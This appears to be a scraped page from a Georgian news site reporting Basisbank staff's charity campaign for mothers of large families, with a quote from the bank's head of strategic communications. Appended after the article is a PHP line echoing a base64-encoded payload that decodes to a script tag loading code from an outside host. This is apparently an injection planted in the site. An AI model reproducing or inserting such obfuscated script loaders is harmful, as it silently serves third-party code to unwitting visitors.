celsiusi
ავერსი საქკაბელი

ბაზისბანკი, კორპორაციული სოციალური პასუხისმგებლობის ინიციატივის ფარგლებში, აგრძელებეს სხვადასხვა სახის საქველმოქმედო კამპანიას. ამჯერად, ბანკის თანამშრომლების ინიციატივითა და ჩართულობით, მრავალშვილიან დედებს მარტის დღესასწაულები მიულოცა.

საქართველოს მასშტაბით ყველა რეგიონში, ბენეფიციარებად შეირჩნენ სოციალურად დაუცველი, მრავალშვილიანი დედები, რომელთაც ყველაზე მეტად სჭირდებათ საზოგადოების გვერდით დგომა.


„ჩვენთვის განსაკუთრებით საამაყო და სასიხარულოა, რომ კამპანიაში დიდი ენთუზიაზმით, აქტიურად ჩაერთო ბაზისბანკის გუნდის წევრები საქართველოს ყველა რეგიონიდან. რა თქმა უნდა, ქველმოქმედებისთვის უმნიშვნელოვანესია კომპანიის ფინანსური მხარდაჭერა, მაგრამ არანაკლებ მნიშვნელოვანი გახლავთ ადამიანური რესურსების კონტრიბუცია.


ბანკის დაფინანსებითა და ჩვენი გუნდის წევრების ჩართულობით, მოხდა ბენეფიციარების მოძიება, მათი ინდივიდუალური საჭიროებების მოკვლევა და შემდეგ, სპეციალურად მათთვის საჭირო ნივთებისა და პროდუქტების შეძენა და გადაცემა.

გვჯერა, რომ ერთმანეთზე ზრუნვა აუცილებლად უკეთესობისკენ შეცვლის ჩვენს მომავალს.
ბაზისბანკისაგან მსგავსი სახის საქველმოქმედო კამპანიებები აუცილებლად გაგრძელდება და მეტად მასშტაბური სახე მიეცემა. ერთად კიდევ ბევრ კარგ საქმეს გავაკეთებთ.“ - ბაზისბანკის სტრატეგიული კომუნიკაციების დეპარტამენტის უფროსი, თამარ ხადური.

(რ) 

377
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");